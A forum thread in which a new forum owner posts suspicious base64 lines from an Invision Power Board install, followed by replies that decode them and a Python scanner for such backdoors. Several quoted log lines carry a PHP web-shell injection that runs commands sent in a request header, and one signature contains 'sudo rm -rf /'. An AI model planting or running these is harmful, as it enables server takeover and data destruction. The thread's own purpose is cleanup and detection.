Posted 04 November 2014 - 08:43 PM
Do you mind if I ask how you obtained these files?
Did someone put them in there for a purpose or did you download a theme/plugin?
I'm just looking to avoid such complications
(on a side note, i've never seen a virus in PHP before)
"Portability is for those who can't write new programs" - Linus Torvalds
Posted 05 November 2014 - 12:13 AM
I bought this forum. Everything was deactivated until now.
Other suspicious file lines:
Line 129: print base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
Line 359: $content = base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
Line 497: if ( ($this->request['s'] == trim( $this->_myRot13( base64_decode("aHR5bF9ieXFfem5nZw==") ) ) ) and ( $this->request['t'] == "" ) )
Line 509: @header( $this->_myRot13( base64_decode("UGJhZ3JhZy1nbGNyOiB2em50ci90dnM=") ) );
Line 511: echo base64_decode($string);
Line 1019: echo base64_decode( "R0lGODlhhgAfAMQAAAAAAP///+/v79/f38/Pz7+/v6+vr5+fn4+Pj4CAgHBwcGBgYFBQUEBAQDAwMCAgIBAQE" .
Line 2876: if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 495: $secret = base64_decode($secret);
Line 227: $b64 = base64_decode($str);
Line 4: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 12: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 16: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 24: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 28: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 36: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 40: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 48: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 52: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 60: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 227: print base64_decode( "...
Line 6015: $errorIconData = base64_decode( 'R0lGODlhKQAlAPf/AP34o/75s6qGFOTi2/32jbKSIvXfTPHqy/Hx8fz3mfz2kvTcQfLx6dTDdf78ybaZNcStXPfjWqF8Df35uv'.
Posted 05 November 2014 - 10:58 AM
None of these look particularly suspicious on their own. Can you please post the full files? Just put them in a .zip file and attach that to your post.
Edited by dargueta, 05 November 2014 - 10:58 AM.
sudo rm -rf / && echo $'Sanitize your inputs!'
Posted 05 November 2014 - 04:29 PM
In the captcha plugin, you will notice upon decoding that the first three characters are GIF, signifying it is simply encoded binary data that the author chose to pack into a string rather than supply as an image separately, while the 'stats' binary appears to be a very small GIF, probably a tracking pixel for legitimate purposes (one of the ROT13 encoded strings is "ugly_old_matt", curiously). Their objective was to blend in with the valid files, making removal difficult, as you may, of course, take out real files.
In these situations, unless there exists a script someone wrote to remove such a backdoor from your IPB installation, the best option will be to write down which plugins it uses, back up the database after checking its contents are what you expect, and install a new and possibly less vulnerable version of IPB.
Alexander.
All new problems require investigation, and so if errors are problems, try to learn as much as you can and report back.
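The triage Alexander describes (decode each base64 literal, check whether it starts with an image magic such as GIF, try the ROT13 reading, and treat an exec function fed from request data as the real finding) can be scripted. This is an added example, not code from the thread or from IPB; the sample PHP lines are constructed to resemble the ones quoted above, and the function names and regexes are my own.

```python
from __future__ import annotations
import base64
import binascii
import codecs
import re

# Constructed sample modelled on the kinds of lines quoted in the thread;
# it is not the forum's actual files.
SAMPLE_PHP = r'''
print base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
if ( $s == trim( $this->_myRot13( base64_decode("aHR5bF9ieXFfem5nZw==") ) ) ) { }
if( isset( $this->request[ base64_decode('eWVhcg==') ] ) ) { }
passthru(base64_decode($_SERVER[HTTP_CMD]));
'''

B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# An exec-style call whose argument is taken from request data is the real backdoor signature.
EXEC_OF_INPUT = re.compile(
    r"\b(passthru|system|exec|shell_exec|eval|popen|proc_open)\s*\(.*\$_(SERVER|GET|POST|REQUEST|COOKIE)"
)
IMAGE_MAGIC = {b"GIF8": "gif", b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg"}


def classify_literal(b64: str) -> tuple[str, str]:
    """Decode one base64 literal; return (label, human-readable detail)."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (ValueError, binascii.Error):
        return ("undecodable", b64[:12])
    for magic, kind in IMAGE_MAGIC.items():
        if raw.startswith(magic):  # packed image bytes, as the thread notes for "GIF"
            return ("image", kind)
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return ("binary", raw[:8].hex())
    # Layered encoding (ROT13 over base64) is a common obfuscation; show both readings.
    return ("text", f"{text} | rot13={codecs.decode(text, 'rot_13')}")


def scan_php(source: str) -> list[tuple[int, str, str]]:
    """Return (line_no, label, detail) for every line that deserves a second look."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if EXEC_OF_INPUT.search(line):
            findings.append((no, "exec-of-request-input", line.strip()))
        for b64 in B64_LITERAL.findall(line):
            label, detail = classify_literal(b64)
            findings.append((no, label, detail))
    return findings


if __name__ == "__main__":
    for no, label, detail in scan_php(SAMPLE_PHP):
        print(f"line {no}: {label}: {detail}")
```

Run it over a suspect file's contents instead of SAMPLE_PHP; image-labelled literals can usually be set aside, while an exec-of-request-input finding is the line to remove.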